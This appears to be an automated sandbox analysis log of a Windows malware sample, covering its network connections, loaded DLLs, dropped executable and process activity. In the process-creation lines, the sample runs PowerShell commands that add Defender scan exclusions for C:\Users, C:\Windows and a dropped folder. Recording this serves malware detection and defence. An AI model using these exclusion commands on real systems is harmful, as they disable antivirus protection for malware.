Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49711 version: TLS 1.2

System Summary

Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00401625 NtQueryInformationProcess,NtQueryInformationProcess,14_2_00401625
Source: Joe Sandbox View  Dropped File: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe 36A780C3CFCC5162D80BF88A5BA5F1BAC2149C1D6D3A04FF5536DECB31D494AC
Source: YYjRtxS70h.exe, 00000000.00000000.1485142901.0000000000652000.00000002.00000001.01000000.00000003.sdmp  Binary or memory string: OriginalFilenameQwest.exe, vs YYjRtxS70h.exe
Source: YYjRtxS70h.exe, 00000000.00000002.1785844596.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: OriginalFilenameclr.dllT vs YYjRtxS70h.exe
Source: YYjRtxS70h.exe  Binary or memory string: OriginalFilenameQwest.exe, vs YYjRtxS70h.exe
Source: classification engine  Classification label: mal88.evad.winEXE@21/24@4/5
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YYjRtxS70h.exe.log
Source: C:\Windows\System32\conhost.exe  Mutant created: \BaseNamedObjects\Local\SM0:516:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Mutant created: NULL
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1640:120:WilError_03
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_03
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1788:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0fimw0nw.epw.ps1
Source: YYjRtxS70h.exe  Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: YYjRtxS70h.exe  Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: YYjRtxS70h.exe  Virustotal: Detection: 62%
Source: YYjRtxS70h.exe  ReversingLabs: Detection: 65%
Source: unknown  Process created: C:\Users\user\Desktop\YYjRtxS70h.exe "C:\Users\user\Desktop\YYjRtxS70h.exe"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo
Source: C:\Windows\System32\conhost.exe  Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Process created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe "C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe"
Source: C:\Windows\System32\conhost.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: version.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: wldp.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: profapi.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: rasman.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: secur32.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: schannel.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exe  Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
